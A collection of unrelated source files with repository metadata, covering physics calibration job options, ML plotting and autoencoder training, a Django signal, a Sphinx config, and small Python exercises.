/athena/LArCalorimeter/LArCalibTools/share/LArMCConditions2Ntuple.py
|
1a35ffa4835cfb273b6320e18243c2bfdc57f847
|
[] |
no_license
|
rushioda/PIXELVALID_athena
|
90befe12042c1249cbb3655dde1428bb9b9a42ce
|
22df23187ef85e9c3120122c8375ea0e7d8ea440
|
refs/heads/master
| 2020-12-14T22:01:15.365949
| 2020-01-19T03:59:35
| 2020-01-19T03:59:35
| 234,836,993
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,483
|
py
|
import AthenaCommon.AtlasUnixGeneratorJob #use MC event selector
from string import split,join
## get a handle to the default top-level algorithm sequence
from AthenaCommon.AlgSequence import AlgSequence
topSequence = AlgSequence()
#Input Parameters:
# PoolFiles: sequence of pool files to read from though CondProxyProvider
# if not given, read from COOL
#
# RunNumber: Input to COOL IOV-DB if reading from
#
# RootFile: root file for the ntuple
#
# Objects: List of objects written to ntuple (PEDESTAL OFC, RAMP,
DBTag='OFLCOND-SDR-BS14T-IBL-06'
if not 'InputDB' in dir():
InputDB="COOLOFL_LAR/OFLP200"
if not "OFCFolder" in dir():
OFCFolder="5samples1phase"
if not 'RunNumber' in dir():
RunNumber=2147483647
if not "RootFile" in dir():
RootFile="LArConditions.root"
if not "Objects" in dir():
Objects=["PEDESTAL","RAMP","OFC","MPHYSOVERMCAL","SHAPE","UA2MEV"]
if not "DBTag" in dir():
DBTag="LARCALIB-000-01"
def doObj(objName):
for o in Objects:
if o.upper().find(objName.upper())!=-1:
return True
return False
def getDBFolderAndTag(folder):
if "TagSuffix" in dir():
tag="<tag>"+join(split(folder, '/'),'') + TagSuffix+"</tag>"
else:
tag=""
return "<db>"+InputDB+"</db>"+folder+tag
from AthenaCommon.GlobalFlags import globalflags
globalflags.DataSource="geant4"
globalflags.InputFormat="pool"
from AthenaCommon.JobProperties import jobproperties
jobproperties.Global.DetDescrVersion = "ATLAS-GEO-18-01-03"
from AthenaCommon.DetFlags import DetFlags
DetFlags.Calo_setOff()
DetFlags.ID_setOff()
DetFlags.Muon_setOff()
DetFlags.Truth_setOff()
DetFlags.LVL1_setOff()
DetFlags.digitize.all_setOff()
#Set up GeoModel (not really needed but crashes without)
from AtlasGeoModel import SetGeometryVersion
from AtlasGeoModel import GeoModelInit
#Get identifier mapping (needed by LArConditionsContainer)
svcMgr.IOVDbSvc.GlobalTag=DBTag
include( "LArConditionsCommon/LArIdMap_comm_jobOptions.py" )
theApp.EvtMax = 1
svcMgr.EventSelector.RunNumber = RunNumber
conddb.addFolder("","<db>COOLOFL_LAR/OFLP200</db>/LAR/BadChannels/BadChannels<key>/LAR/BadChannels/BadChannels</key>")
conddb.addFolder("","<db>COOLOFL_LAR/OFLP200</db>/LAR/BadChannels/MissingFEBs<key>/LAR/BadChannels/MissingFEBs</key>")
conddb.addOverride('/LAR/Identifier/FebRodAtlas','FebRodAtlas-005')
conddb.addOverride('/LAR/Identifier/OnOffIdAtlas','OnOffIdAtlas-012')
if 'PoolFiles' in dir():
from AthenaCommon.ConfigurableDb import getConfigurable
from AthenaCommon.AppMgr import ServiceMgr
ServiceMgr.ProxyProviderSvc.ProviderNames += [ "CondProxyProvider" ]
ServiceMgr += getConfigurable( "CondProxyProvider" )()
svcMgr.CondProxyProvider.InputCollections=PoolFiles
if 'PoolCat' in dir():
svcMgr.PoolSvc.ReadCatalog+=["xmlcatalog_file:"+PoolCat]
loadCastorCat=False
if doObj("PEDESTAL"):
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/Pedestal"))
from LArCalibTools.LArCalibToolsConf import LArPedestals2Ntuple
LArPedestals2Ntuple=LArPedestals2Ntuple("LArPedestals2Ntuple")
LArPedestals2Ntuple.AddFEBTempInfo=False
topSequence+=LArPedestals2Ntuple
if doObj("AUTOCORR"):
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibOfl/AutoCorrs/AutoCorr"))
from LArCalibTools.LArCalibToolsConf import LArAutoCorr2Ntuple
LArAutoCorr2Ntuple=LArAutoCorr2Ntuple("LArAutoCorr2Ntuple")
LArAutoCorr2Ntuple.AddFEBTempInfo=False
topSequence+=LArAutoCorr2Ntuple
if doObj("OFC"):
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/HVScaleCorr"))
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/Noise"))
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/AutoCorr"))
from LArRecUtils.LArADC2MeVToolDefault import LArADC2MeVToolDefault
from LArRecUtils.LArAutoCorrNoiseToolDefault import LArAutoCorrNoiseToolDefault
theLArADC2MeVToolDefault = LArADC2MeVToolDefault()
ToolSvc += theLArADC2MeVToolDefault
theLArAutoCorrNoiseToolDefault = LArAutoCorrNoiseToolDefault()
theLArAutoCorrNoiseToolDefault.NSamples = 5
ToolSvc += theLArAutoCorrNoiseToolDefault
from LArRecUtils.LArOFCToolDefault import LArOFCToolDefault
theOFCTool = LArOFCToolDefault()
theOFCTool.Dump=True
ToolSvc += theOFCTool
from LArCalibTools.LArCalibToolsConf import LArOFC2Ntuple
LArOFC2Ntuple = LArOFC2Ntuple("LArOFC2Ntuple")
LArOFC2Ntuple.ContainerKey = "LArOFC"
LArOFC2Ntuple.AddFEBTempInfo=False
LArOFC2Ntuple.IsMC = True
LArOFC2Ntuple.OFCTool = theOFCTool
topSequence+=LArOFC2Ntuple
if (doObj("SHAPE")):
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/Shape"))
from LArCalibTools.LArCalibToolsConf import LArShape2Ntuple
LArShape2Ntuple = LArShape2Ntuple("LArShape2Ntuple")
LArShape2Ntuple.ContainerKey = "LArShape"
LArShape2Ntuple.AddFEBTempInfo=False
LArShape2Ntuple.IsMC = True
topSequence+=LArShape2Ntuple
if doObj("RAMP"):
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/Ramp"))
from LArCalibTools.LArCalibToolsConf import LArRamps2Ntuple
LArRamps2Ntuple=LArRamps2Ntuple("LArRamps2Ntuple")
LArRamps2Ntuple.NtupleName = "RAMPS"
LArRamps2Ntuple.RawRamp = False
LArRamps2Ntuple.IsMC = True
LArRamps2Ntuple.AddFEBTempInfo=False
topSequence+=LArRamps2Ntuple
if (doObj("UA2MEV")):
print 'DAC2uA check : ',getDBFolderAndTag("/LAR/ElecCalibMC/DAC2uA")
print 'uA2MeV check : ',getDBFolderAndTag("/LAR/ElecCalibMC/uA2MeV")
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/DAC2uA"))
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/uA2MeV"))
from LArCalibTools.LArCalibToolsConf import LAruA2MeV2Ntuple
LAruA2MeV2Ntuple=LAruA2MeV2Ntuple("LAruA2MeV2Ntuple")
LAruA2MeV2Ntuple.AddFEBTempInfo=False
topSequence+=LAruA2MeV2Ntuple
if (doObj("MPHYSOVERMCAL")):
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/MphysOverMcal"))
from LArCalibTools.LArCalibToolsConf import LArMphysOverMcal2Ntuple
LArMphysOverMcal2Ntuple=LArMphysOverMcal2Ntuple("LArMphysOverMcal2Ntuple")
LArMphysOverMcal2Ntuple.AddFEBTempInfo=False
LArMphysOverMcal2Ntuple.IsMC=True
topSequence+=LArMphysOverMcal2Ntuple
if loadCastorCat:
svcMgr.PoolSvc.ReadCatalog += ['xmlcatalog_file:'+'/afs/cern.ch/atlas/conditions/poolcond/catalogue/poolcond/PoolCat_comcond_castor.xml']
theApp.HistogramPersistency = "ROOT"
from GaudiSvc.GaudiSvcConf import NTupleSvc
svcMgr += NTupleSvc()
svcMgr.NTupleSvc.Output = [ "FILE1 DATAFILE='"+RootFile+"' OPT='NEW'" ]
svcMgr.MessageSvc.OutputLevel = DEBUG
svcMgr.IOVDbSvc.DBInstance="OFLP200"
|
[
"rushioda@lxplus754.cern.ch"
] |
rushioda@lxplus754.cern.ch
|
ff99c5b38da07f2441b44b40a4551a011355c801
|
df100f181d9564bc3641dfec45726ac1cc1b2325
|
/剑指offer/33.第一个只出现一次的字符/code2.py
|
53b3b23a1aa9e81810711f85bca9b99e7fa8d470
|
[] |
no_license
|
forthlsss/codeForInterview
|
83efe7d5e0e9f150abae2d84f50829d99034dae1
|
10791dfc3c34f0a236a386fe9a91f46d725bded5
|
refs/heads/master
| 2020-12-03T12:32:51.071062
| 2020-01-14T06:49:48
| 2020-01-14T06:49:48
| 231,318,350
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 262
|
py
|
def FirstNotRepeatingChar(s):
# write code here
map = {}
for i in range(len(s)):
map[s[i]] = map.get(s[i], 0) + 1
for i in range(len(s)):
if map[s[i]] == 1:
return i
return -1
print(FirstNotRepeatingChar('abac'))
|
[
"noreply@github.com"
] |
noreply@github.com
|
e1ba67a60183bb2601c60345b23bedce84b2c2b2
|
b13df72a0259b298a47b7c98d8c183789eea02d6
|
/pacpac/parapred/plotting.py
|
ed89623074a96810a96708a16f416ae507e7a66d
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
aretasg/pacpac
|
c7f679e34f2c4a8b11f5d16669db052a6f73efd2
|
3d0e2beb82a55e4632270d9578e93a096c9f0ecf
|
refs/heads/main
| 2023-04-19T06:06:18.190562
| 2022-04-23T00:00:53
| 2022-04-23T00:00:53
| 333,276,229
| 6
| 3
|
BSD-3-Clause
| 2021-07-27T12:12:14
| 2021-01-27T02:13:06
|
Python
|
UTF-8
|
Python
| false
| false
| 5,256
|
py
|
from sklearn import metrics
import numpy as np
import matplotlib.pyplot as plt
def plot_stats(history, plot_filename="stats.pdf"):
plt.figure()
plt.rc("text", usetex=True)
plt.rc("font", family="sans-serif")
plt.title("Metrics vs number of epochs")
plt.subplot(3, 1, 1)
plt.plot(history.history["loss"])
plt.plot(history.history["val_loss"])
plt.ylabel("Loss")
plt.xlabel("Epoch")
plt.legend(["Training set", "Validation set"], loc="upper left")
plt.subplot(3, 1, 2)
plt.plot(history.history["false_pos"])
plt.plot(history.history["val_false_pos"])
plt.ylabel("False positive rate")
plt.xlabel("Epoch")
plt.legend(["Training set", "Validation set"], loc="upper left")
plt.subplot(3, 1, 3)
plt.plot(history.history["false_neg"])
plt.plot(history.history["val_false_neg"])
plt.ylabel("False negative rate")
plt.xlabel("Epoch")
plt.legend(["Training set", "Validation set"], loc="upper left")
plt.savefig(plot_filename)
def plot_pr_curve(
labels_test,
probs_test,
colours=("#0072CF", "#68ACE5"),
label="This method",
plot_fig=None,
):
if plot_fig is None:
plot_fig = plt.figure(figsize=(4.5, 3.5), dpi=300)
ax = plot_fig.gca()
num_runs = len(labels_test)
precs = np.zeros((num_runs, 10000))
recalls = np.linspace(0.0, 1.0, num=10000)
for i in range(num_runs):
l = labels_test[i]
p = probs_test[i]
prec, rec, _ = metrics.precision_recall_curve(l.flatten(), p.flatten())
# Maximum interpolation
for j in range(len(prec)):
prec[j] = prec[: (j + 1)].max()
prec = list(reversed(prec))
rec = list(reversed(rec))
for j, recall in enumerate(recalls): # Inefficient, but good enough
for p, r in zip(prec, rec):
if r >= recall:
precs[i, j] = p
break
avg_prec = np.average(precs, axis=0)
err_prec = np.std(precs, axis=0)
ax.plot(recalls, avg_prec, c=colours[0], label=label)
btm_err = avg_prec - 2 * err_prec
btm_err[btm_err < 0.0] = 0.0
top_err = avg_prec + 2 * err_prec
top_err[top_err > 1.0] = 1.0
ax.fill_between(recalls, btm_err, top_err, facecolor=colours[1])
ax.set_ylabel("Precision")
ax.set_xlabel("Recall")
ax.legend()
print("Average precision: {}".format(np.mean(avg_prec)))
return plot_fig
def plot_abip_pr(plot_fig=None):
if plot_fig is None:
plot_fig = plt.figure(figsize=(4.5, 3.5), dpi=300)
ax = plot_fig.gca()
abip_rec = np.array([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 0.92])
abip_pre = np.array([0.77, 0.74, 0.66, 0.61, 0.56, 0.51, 0.50, 0.48, 0.44, 0.415])
abip_std = np.array(
[0.06, 0.04, 0.031, 0.028, 0.026, 0.023, 0.02, 0.015, 0.013, 0.012]
)
ax.errorbar(
abip_rec,
abip_pre,
yerr=2 * abip_std,
label="Antibody i-Patch (ABiP)",
fmt="o",
mfc="#EA7125",
mec="#EA7125",
ms=3,
ecolor="#F3BD48",
elinewidth=1,
capsize=3,
)
ax.set_ylabel("Precision")
ax.set_xlabel("Recall")
ax.legend()
return plot_fig
def plot_roc_curve(
labels_test,
probs_test,
colours=("#0072CF", "#68ACE5"),
label="This method",
plot_fig=None,
):
if plot_fig is None:
plot_fig = plt.figure(figsize=(3.7, 3.7), dpi=400)
ax = plot_fig.gca()
num_runs = len(labels_test)
tprs = np.zeros((num_runs, 10000))
fprs = np.linspace(0.0, 1.0, num=10000)
for i in range(num_runs):
l = labels_test[i]
p = probs_test[i]
fpr, tpr, _ = metrics.roc_curve(l.flatten(), p.flatten())
for j, fpr_val in enumerate(fprs): # Inefficient, but good enough
for t, f in zip(tpr, fpr):
if f >= fpr_val:
tprs[i, j] = t
break
avg_tpr = np.average(tprs, axis=0)
err_tpr = np.std(tprs, axis=0)
ax.plot(fprs, avg_tpr, c=colours[0], label=label)
btm_err = avg_tpr - 2 * err_tpr
btm_err[btm_err < 0.0] = 0.0
top_err = avg_tpr + 2 * err_tpr
top_err[top_err > 1.0] = 1.0
ax.fill_between(fprs, btm_err, top_err, facecolor=colours[1])
ax.set_ylabel("True positive rate")
ax.set_xlabel("False positive rate")
ax.legend()
return plot_fig
def plot_binding_profiles(
contact, parapred, colours=("#0072CF", "#D6083B"), save_as="binding_profiles.eps"
):
plt.rcParams["font.family"] = "Arial"
plot_fig = plt.figure(figsize=(4.8, 3.7), dpi=400)
ax = plot_fig.gca()
# Is order in contact and parapred values always the same?
ind = np.arange(len(contact.keys()))
width = 0.35
ax.bar(
ind, np.array(list(contact.values())), width, color=colours[0], label="Contact"
)
ax.bar(
ind + width,
np.array(list(parapred.values())),
width,
color=colours[1],
label="Model's predictions",
)
ax.set_ylabel("Relative binding frequency")
ax.set_title("Residue type binding profile")
ax.set_xticks(ind + width / 2)
ax.set_xticklabels(contact.keys())
plt.legend()
plt.savefig(save_as)
|
[
"gasp@Aretass-MacBook-Pro.local"
] |
gasp@Aretass-MacBook-Pro.local
|
66a4c5f13e1dc79c7ef110ee7f36ab90411658d1
|
3a6cf9261ca5e58468622f49cfa109d65f7b4eda
|
/src/python/spikes/stereo.py
|
3bfe579ce6e4881dbb41e9f01fcc2026dd9dddab
|
[] |
no_license
|
romilly/cluster-hat
|
a6784f85da5287466a73ef61a0111063bcd171b1
|
a872da5bfa6ab2cb666095ab6845bafa5d4badca
|
refs/heads/master
| 2021-05-09T13:30:34.743067
| 2018-01-30T15:11:35
| 2018-01-30T15:11:35
| 119,036,856
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 295
|
py
|
import numpy as np
import cv2
from matplotlib import pyplot as plt
imgL = cv2.imread('images/p1-image1.jpg',0)
imgR = cv2.imread('images/p2-image1.jpg',0)
stereo = cv2.StereoBM_create(numDisparities=16, blockSize=15)
disparity = stereo.compute(imgL,imgR)
plt.imshow(disparity,'gray')
plt.show()
|
[
"romilly.cocking@gmail.com"
] |
romilly.cocking@gmail.com
|
335a917f993a2444982d969d5168c22b7ae98d6d
|
6d5fd2e7b9a66e17593a490a80e96e95d36436a3
|
/src/profiles/signals.py
|
81924a9d88eb4f0810a55822910c9384d971ed0a
|
[] |
no_license
|
Husain-Jinia/Django-Report-Generator
|
f38276b47c263824b2f6794d793ff63872ba31fc
|
277a06584e7d333d9380f213abc217e29ecafd17
|
refs/heads/master
| 2023-04-20T06:05:13.294836
| 2021-05-15T08:01:11
| 2021-05-15T08:01:11
| 365,412,503
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 376
|
py
|
from .models import Profile
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
@receiver(post_save, sender=User)
def post_save_create_profile(sender, instance, created, **kwargs):
print(sender)
print(instance)
print(created)
if created:
Profile.objects.create(user=instance)
|
[
"husainjinia0201@gmail.com"
] |
husainjinia0201@gmail.com
|
a18d18d5499fe363256254b60eafa134abbde7af
|
91af92779be5fa5cea94a835543173d0c907b1e5
|
/Lab4/src/flnn_one_channel_with_autoencoder.py
|
60f603a1a7c43f9cd35d95f790f94f61e4bd0b49
|
[] |
no_license
|
mabean/DeepLearning
|
fe9579683804a7b86d82256528cc3ad2899abe7a
|
9438d5aeb5c6ba7f24a7cb0e6b3afb253e43f93f
|
refs/heads/master
| 2021-09-01T08:00:14.231043
| 2017-12-25T22:06:56
| 2017-12-25T22:06:56
| 109,853,089
| 0
| 1
| null | 2017-12-25T22:06:57
| 2017-11-07T15:22:17
|
Python
|
UTF-8
|
Python
| false
| false
| 4,831
|
py
|
import sys
sys.path.append('../../data/')
import tfrecords_reader as reader
from tfrecords_converter import rgb_to_y
import tensorflow as tf
import numpy as np
batch_size = 30
test_batch_size = 30
batches_count = 1000
tests_count = 100
features_size = 256 * 256
hidden_layer1_size = 1000
hidden_layer2_size = 300
classes_size = 3
learning_rate = 0.01
num_steps = 1000
display_step = 500
filename_train_queue = tf.train.string_input_producer(["../../data/dataset_train.tfrecords"])
filename_test_queue = tf.train.string_input_producer(["../../data/dataset_test.tfrecords"])
train_images, train_labels = reader.read (filename_train_queue)
x_tensor, y_tensor = reader.next_batch3d(train_images, train_labels, batch_size)
test_images, test_labels = reader.read (filename_test_queue)
x_test_Tensor, y_test_Tensor = reader.next_batch3d(test_images, test_labels, test_batch_size)
#CountOfImages, height, weight, RGB
x = tf.placeholder(tf.float32, [None, features_size])
y = tf.placeholder(tf.float32, [None, classes_size])
W1_encoder = tf.get_variable('W1_encoder', [features_size, hidden_layer1_size], initializer=tf.random_normal_initializer())
W2_encoder = tf.get_variable('W2_encoder', [hidden_layer1_size, hidden_layer2_size], initializer=tf.random_normal_initializer())
W1_decoder = tf.get_variable('W1_decoder', [hidden_layer2_size, hidden_layer1_size], initializer=tf.random_normal_initializer())
W2_decoder = tf.get_variable('W2_decoder', [hidden_layer1_size, features_size], initializer=tf.random_normal_initializer())
def encoder(X):
b1_encoder = tf.get_variable('b1_encoder', [1,], initializer=tf.constant_initializer(0.0))
y1 = tf.nn.relu(tf.matmul(X, W1_encoder) + b1_encoder)
b2_encoder = tf.get_variable('b2_encoder', [1,], initializer=tf.constant_initializer(0.0))
y2 = tf.nn.relu(tf.matmul(y1, W2_encoder) + b2_encoder)
return y2;
def decoder(X_):
b1_decoder = tf.get_variable('b1_decoder', [1,], initializer=tf.constant_initializer(0.0))
y3 = tf.nn.relu(tf.matmul(X_, W1_decoder) + b1_decoder)
b2_decoder = tf.get_variable('b2_decoder', [1,], initializer=tf.constant_initializer(0.0))
y4 = tf.nn.relu(tf.matmul(y3, W2_decoder) + b2_decoder)
return y4;
encoder_op = encoder(x)
decoder_op = decoder(encoder_op)
y_pred = decoder_op
y_true = x
loss = tf.reduce_mean(tf.pow(y_true - y_pred, 2))
optimizer = tf.train.RMSPropOptimizer(learning_rate).minimize(loss)
W3 = tf.get_variable('W3', [hidden_layer2_size, classes_size], initializer=tf.random_normal_initializer())
b3 = tf.get_variable('b3', [1,], initializer=tf.constant_initializer(0.0))
y_ = tf.nn.softmax(tf.matmul(encoder_op, W3) + b3)
cross_entropy = tf.reduce_mean(-tf.reduce_sum(y * tf.log(y_),
reduction_indices=[1]))
train_step = tf.train.GradientDescentOptimizer(learning_rate=0.5).minimize(cross_entropy)
init_op = tf.global_variables_initializer()
# Train
with tf.Session() as sess:
sess.run (init_op)
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
print ("Autoencoder...")
for i in range(1, num_steps+1):
print (100 * i/num_steps,'%\r', end ='')
# Prepare Data
batch_x, _ = sess.run ([x_tensor, y_tensor])
x_2d_a = rgb_to_y(batch_x[:,:,:,0], batch_x[:,:,:,1], batch_x[:,:,:,2])
x_b_a = x_2d_a.reshape(batch_size, -1) / 255
# Run optimization op (backprop) and cost op (to get loss value)
_, l = sess.run([optimizer, loss], feed_dict={x: x_b_a})
# Display logs per step
if i % display_step == 0 or i == 1:
print('Step %i: Minibatch Loss: %f' % (i, l))
for _ in range(batches_count):
print (100 * _/batches_count,'%\r', end ='')
x_2d3c, y_b = sess.run ([x_tensor, y_tensor])
x_2d = rgb_to_y(x_2d3c[:,:,:,0], x_2d3c[:,:,:,1], x_2d3c[:,:,:,2])
x_b = x_2d.reshape(batch_size, -1) / 255
vec_y = np.zeros([batch_size, 3])
vec_y[range(batch_size), y_b] = 1
sess.run(train_step, feed_dict={ x: x_b, y: vec_y })
print ("Testing trained model...")
correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
sum_accuracy = 0
for _ in range(tests_count):
x_test, y_test = sess.run ([x_test_Tensor, y_test_Tensor])
x_2d = rgb_to_y(x_2d3c[:,:,:,0], x_2d3c[:,:,:,1], x_2d3c[:,:,:,2])
x_test = x_2d.reshape(batch_size, -1) / 255
resize_test_y = np.zeros ([len(y_test), 3])
resize_test_y[range(len(y_test)), y_test] = 1
sum_accuracy += sess.run(accuracy, feed_dict={x: x_test, y: resize_test_y})
print("Accuracy: {:f}".format(sum_accuracy / tests_count))
coord.request_stop()
coord.join(threads)
|
[
"bespalov.maxim.a@gmail.com"
] |
bespalov.maxim.a@gmail.com
|
4dcec4c4fe540cd895c7929f3502d6567240ec98
|
ae0014e2bd7700d6b9c63055a74b0f68752c72bd
|
/interdiction/win.py
|
d49fb575a207bb129edd302cee2e7f2c90b7a144
|
[] |
no_license
|
Anderson-Cooper/Elite-Py
|
f8659f01e35c33455b1c52610fdfe88c54860523
|
af10235446c94ba5a8a454014b18d34faec21840
|
refs/heads/master
| 2023-07-24T02:08:39.986386
| 2020-02-28T00:01:32
| 2020-02-28T00:01:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 147
|
py
|
print("You DEMOLISHED your enemy, you used his ship parts to repair your ship, And you have his court hearing soon so you will be taken to A-96-A")
|
[
"apollopulk@gmail.com"
] |
apollopulk@gmail.com
|
ddf22e15b1dca17e2d83a188596d14e2a2085f9d
|
3e2dc3be3361c25680adb450a0010a5c3069670d
|
/pets.py
|
401d48f17adb1fce2a80cc9bc0ae3d35063d7dc7
|
[] |
no_license
|
PrashishMan/python_init
|
0880b6eb9a0dfd853c79a300d31cc67e1c1f3d6d
|
5edc9c28efc75684476cde319262a6ae5054fcb8
|
refs/heads/master
| 2020-06-15T08:25:52.157207
| 2019-07-04T13:37:10
| 2019-07-04T13:37:10
| 195,248,324
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 562
|
py
|
from inheritance import b
class Pet:
allowed = ["cat", "dog", "fish", "gecko"]
@classmethod
def class_attribute(cls):
print(cls.allowed)
def __init__(self, name, species):
if species.lower() not in Pet.allowed:
raise ValueError(f"You cannot have a {species} pet")
self.name = name
self.species = species
def set_species(self, species):
if species.lower() not in Pet.allowed:
raise ValueError(f"You cannot have a {species} pet")
self.species = species
cat = Pet("vla", "cat")
dot = Pet("chinkey", "dog")
Pet.class_attribute()
print(b)
|
[
"prashishmansingh@Prashishs-MacBook-Pro.local"
] |
prashishmansingh@Prashishs-MacBook-Pro.local
|
9fa9501354ccb47bd2b1c9941aa2838909db9cae
|
f6b50c0f68ec0c7a239ea8cf2e05b6eaa718372d
|
/cha1数据结构和算法/1.7字典排序.py
|
bcdaec1df117a165581bda26c5f5aef07f4a59af
|
[] |
no_license
|
Pluto13579/Python3-cookbook
|
23e05abc15fbd95b4a61b2f2905996e4e0883ebb
|
0ba46aa98035a7ce63ccca4e15f0bc7130f88372
|
refs/heads/master
| 2020-04-10T21:46:25.473564
| 2019-01-27T05:49:46
| 2019-01-27T05:49:46
| 161,306,056
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 792
|
py
|
#collections模块中的OrderDict类可以用来控制一个字典中元素的顺序。
#OrderedDict内部维护着一个根据键插入顺序排序的双向链表。每当插入一个新元素都会放到链表的尾部。
#对于一个已存在的键的重复赋值不会改变键的顺序。
#需要注意的是一个OrderedDict的大小是一个普通字典的两倍,因为内部维护着另外一个链表。
#
from collections import OrderedDict
d = OrderedDict()
d['foo'] = 1
d['bar'] = 2
d['spam'] = 3
d['grok'] = 4
for key in d: # Outputs "foo 1", "bar 2", "spam 3", "grok 4"
print(key, d[key])
#也可精确控制json编码后字段的顺序,可以先使用OrderedDict来构建这样的数据:
import json
json.dumps(d) #{"foo": 1, "bar": 2, "spam": 3, "grok": 4}
|
[
"1134369366@qq.com"
] |
1134369366@qq.com
|
807657e50b6e6f7c7877b940ddd11fcf6634620e
|
60a33ff566330b0bfcfa09efb8ede669afb1a800
|
/example/docs/conf.py
|
7f504b31adccd76ab3c6e21ff9546b0526827dee
|
[
"MIT"
] |
permissive
|
clayrisser/pipedoc
|
20674b0daf41ff7aece40b71b7505653b3142fdb
|
7e21e68641e5368d7f7d60d539d674d4d73bac5e
|
refs/heads/main
| 2023-08-03T12:43:45.288494
| 2023-07-13T11:32:31
| 2023-07-13T11:32:31
| 238,533,996
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,967
|
py
|
# from sphinx_markdown_parser.parser import MarkdownParser
from recommonmark.transform import AutoStructify
author = 'Jam Risser'
copyright = '2020, '+author
description = ''
doc_root = 'https://github.com/rtfd/recommonmark/tree/master/doc/'
html_static_path = ['_static']
html_theme = 'sphinx_rtd_theme'
project = 'pipedoc-example'
htmlhelp_basename = project+'doc'
js_language = 'typescript'
js_source_paths = ['../../../../src']
language = None
master_doc = 'index'
needs_sphinx = '1.0'
primary_domain = 'js'
pygments_style = 'sphinx'
release = '0.0.6'
templates_path = ['_templates']
todo_include_todos = False
extensions = [
'recommonmark',
'sphinx.ext.mathjax',
'sphinx_js'
]
latex_documents = [(
master_doc,
project+'.tex',
project+' documentation',
author,
'manual'
)]
latex_elements = {
'papersize': 'letterpaper',
'pointsize': '10pt',
'preamble': '',
'figure_align': 'htbp'
}
man_pages = [(
master_doc,
project,
project+' documentation',
[author],
1
)]
exclude_patterns = [
'dist/**/*',
'env/**/*'
]
texinfo_documents = [(
master_doc,
project,
project+' documentation',
author,
project,
description,
'Miscellaneous'
)]
def setup(app):
# app.add_source_parser(MarkdownParser)
# app.add_source_suffix('.md', 'markdown')
# app.add_config_value('markdown_parser_config', {
app.add_config_value('recommonmark_config', {
'auto_toc_tree_section': 'Content',
'auto_toc_tree_section': 'Contents',
'enable_auto_doc_ref': True,
'enable_auto_toc_tree': True,
'enable_eval_rst': True,
'url_resolver': lambda url: doc_root + url,
# 'extensions': [
# 'extra',
# 'nl2br',
# 'pymdownx.arithmatex',
# 'sane_lists',
# 'smarty',
# 'toc',
# 'wikilinks'
# ],
}, True)
app.add_transform(AutoStructify)
|
[
"jam@codejam.ninja"
] |
jam@codejam.ninja
|
fdfcc529f6d09a71f492eb3dcbb32d0cd8eccb2a
|
2e5b5b3dacd4853ec335bf7026a24e2d294c98ce
|
/python-backend/controller/__init__.py
|
e742fdbf3dc8d2d1c2c3699953b00cf2d39107ab
|
[] |
no_license
|
DyvakYA/python-reactjs
|
19f75bd6278a3f4c4fcfaedf3d5c64a8e85febf2
|
3d0af66148caafb3e4450acd38a34ad6a092ed24
|
refs/heads/master
| 2020-04-27T21:01:15.508287
| 2019-03-10T17:50:47
| 2019-03-10T17:50:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 354
|
py
|
# Import the Framework
from flask import Flask
from flask_restful import Api
from .connection import get_connection
from .user_controller import User
from .user_controller import Users
# Create the instance of Flask
app = Flask(__name__)
# Create the API
api = Api(app)
api.add_resource(Users, '/users')
api.add_resource(User, '/users/<string:id>')
|
[
"dyvakyurii@gmail.com"
] |
dyvakyurii@gmail.com
|
b968c173c17ee7e0970eab6d6e3ee7ba4a7e8ab9
|
ca77e9e45d666771c7b0897e7e3093b3d3c12f65
|
/random_scripts/update_costs/update_wo_costs.py
|
20ad1cd9856990dbe5c11c2b9e38c6a9d2275cf5
|
[] |
no_license
|
2gDigitalPost/custom
|
46175d3a3fc4c3be21dc20203ff0a48fb93b5639
|
6a3a804ef4ef6178044b70ad1e4bc5c56ab42d8d
|
refs/heads/master
| 2020-04-04T07:40:17.962611
| 2016-12-28T18:35:28
| 2016-12-28T18:35:28
| 39,648,283
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,309
|
py
|
import os, sys, math, hashlib, getopt, tacticenv, time
def kill_mul_spaces(origstrg):
newstrg = ''
for word in origstrg.split():
newstrg=newstrg+' '+word
return newstrg
def make_data_dict(file_name):
the_file = open(file_name, 'r')
fields = []
data_dict = {}
count = 0
for line in the_file:
line = line.rstrip('\r\n')
data = line.split('\t')
if count == 0:
for field in data:
field = kill_mul_spaces(field)
field = field.strip(' ')
fields.append(field)
else:
data_count = 0
this_code = ''
for val in data:
val = kill_mul_spaces(val)
val = val.strip(' ')
if data_count == 0:
data_dict[val] = {}
this_code = val
else:
data_dict[this_code][fields[data_count]] = val
data_count = data_count + 1
count = count + 1
the_file.close()
print "FIELDS = %s" % fields
return data_dict
opts, work_order_file = getopt.getopt(sys.argv[1], '-m')
print "work_order_file = %s" % work_order_file
opts, task_file = getopt.getopt(sys.argv[2], '-m')
print "task_file = %s" % task_file
opts, group_file = getopt.getopt(sys.argv[3], '-m')
print "group_file = %s" % group_file
